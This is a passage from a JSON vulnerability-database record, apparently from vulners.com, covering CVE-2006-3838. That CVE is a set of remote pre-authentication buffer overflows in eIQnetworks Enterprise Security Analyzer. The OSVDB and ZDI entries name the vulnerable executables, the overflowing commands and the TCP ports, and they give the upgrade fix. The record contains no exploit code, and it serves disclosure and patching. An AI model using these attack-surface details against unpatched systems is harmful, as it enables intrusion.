URL](http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf)\n[Secunia Advisory ID:21213](https://secuniaresearch.flexerasoftware.com/advisories/21213/)\n[Secunia Advisory ID:21214](https://secuniaresearch.flexerasoftware.com/advisories/21214/)\n[Secunia Advisory ID:21215](https://secuniaresearch.flexerasoftware.com/advisories/21215/)\n[Secunia Advisory ID:21218](https://secuniaresearch.flexerasoftware.com/advisories/21218/)\n[Secunia Advisory ID:21211](https://secuniaresearch.flexerasoftware.com/advisories/21211/)\n[Secunia Advisory ID:21217](https://secuniaresearch.flexerasoftware.com/advisories/21217/)\n[Related OSVDB ID: 27529](https://vulners.com/osvdb/OSVDB:27529)\n[Related OSVDB ID: 27526](https://vulners.com/osvdb/OSVDB:27526)\n[Related OSVDB ID: 27525](https://vulners.com/osvdb/OSVDB:27525)\n[Related OSVDB ID: 27528](https://vulners.com/osvdb/OSVDB:27528)\nOther Advisory 
URL: http://www.zerodayinitiative.com/advisories/ZDI-06-024.html\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/TSRT-06-03.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0605.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0700.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0701.html\nKeyword: TSRT-06-03\nKeyword: TCP port 10617\n[CVE-2006-3838](https://vulners.com/cve/CVE-2006-3838)\n", "published": "2006-07-25T05:34:16", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:27527", "cvelist": ["CVE-2006-3838"], "lastseen": "2017-04-28T13:20:24"}, {"id": "OSVDB:27528", "type": "osvdb", "title": "eIQnetworks Enterprise Security Analyzer Topology.exe Pre-authentication Remote Overflow", "description": "## Vulnerability Description\nA remote overflow exists in eIQnetworks Enterprise Security Analyzer. Topology.exe fails to perform proper bounds checking on the GUIADDDEVICE, ADDDEVICE, or DELETEDEVICE commands passed to TCP port 10628 resulting in a stack based buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 2.5.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in eIQnetworks Enterprise Security Analyzer. Topology.exe fails to perform proper bounds checking on the GUIADDDEVICE, ADDDEVICE, or DELETEDEVICE commands passed to TCP port 10628 resulting in a stack based buffer overflow. 
With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.toplayer.com/content/products/intrusion_detection/index.jsp\n[Vendor Specific Advisory URL](http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf)\n[Secunia Advisory ID:21213](https://secuniaresearch.flexerasoftware.com/advisories/21213/)\n[Secunia Advisory ID:21214](https://secuniaresearch.flexerasoftware.com/advisories/21214/)\n[Secunia Advisory ID:21215](https://secuniaresearch.flexerasoftware.com/advisories/21215/)\n[Secunia Advisory ID:21218](https://secuniaresearch.flexerasoftware.com/advisories/21218/)\n[Secunia Advisory ID:21211](https://secuniaresearch.flexerasoftware.com/advisories/21211/)\n[Secunia Advisory ID:21217](https://secuniaresearch.flexerasoftware.com/advisories/21217/)\n[Related OSVDB ID: 27529](https://vulners.com/osvdb/OSVDB:27529)\n[Related OSVDB ID: 27526](https://vulners.com/osvdb/OSVDB:27526)\n[Related OSVDB ID: 27527](https://vulners.com/osvdb/OSVDB:27527)\n[Related OSVDB ID: 27525](https://vulners.com/osvdb/OSVDB:27525)\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/TSRT-06-04.html\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-024.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0700.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0701.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0604.html\nKeyword: TCP port 10628\nKeyword: TSRT-06-04\n[CVE-2006-3838](https://vulners.com/cve/CVE-2006-3838)\n", "published": "2006-07-25T05:34:16", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:27528", "cvelist": ["CVE-2006-3838"], "lastseen": "2017-04-28T13:20:24"}], "zdi": [{"id": "ZDI-06-023", "type": "zdi", 
"title": "eIQnetworks Enterprise Security Analyzer Syslog TCP Server Buffer Overflow Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of eIQnetworks Enterprise Security Analyzer. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the Syslog daemon, syslogserver.exe, during the processing of long strings transmitted to the listening TCP port. The vulnerability is not exposed over UDP. The default configuration does not expose the open TCP port.", "published": "2006-07-25T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.zerodayinitiative.com/advisories/ZDI-06-023", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-11-09T00:18:16"}, {"id": "ZDI-06-024", "type": "zdi", "title": "eIQnetworks Enterprise Security Analyzer License Manager Buffer Overflow", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of eIQnetworks Enterprise Security Analyzer. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within EnterpriseSecurityAnalyzer.exe, which binds by default to TCP port 10616. During the processing of long arguments to the LICMGR_ADDLICENSE command a classic stack based buffer overflow occurs.", "published": "2006-07-25T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.zerodayinitiative.com/advisories/ZDI-06-024", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-11-09T00:18:10"}]}}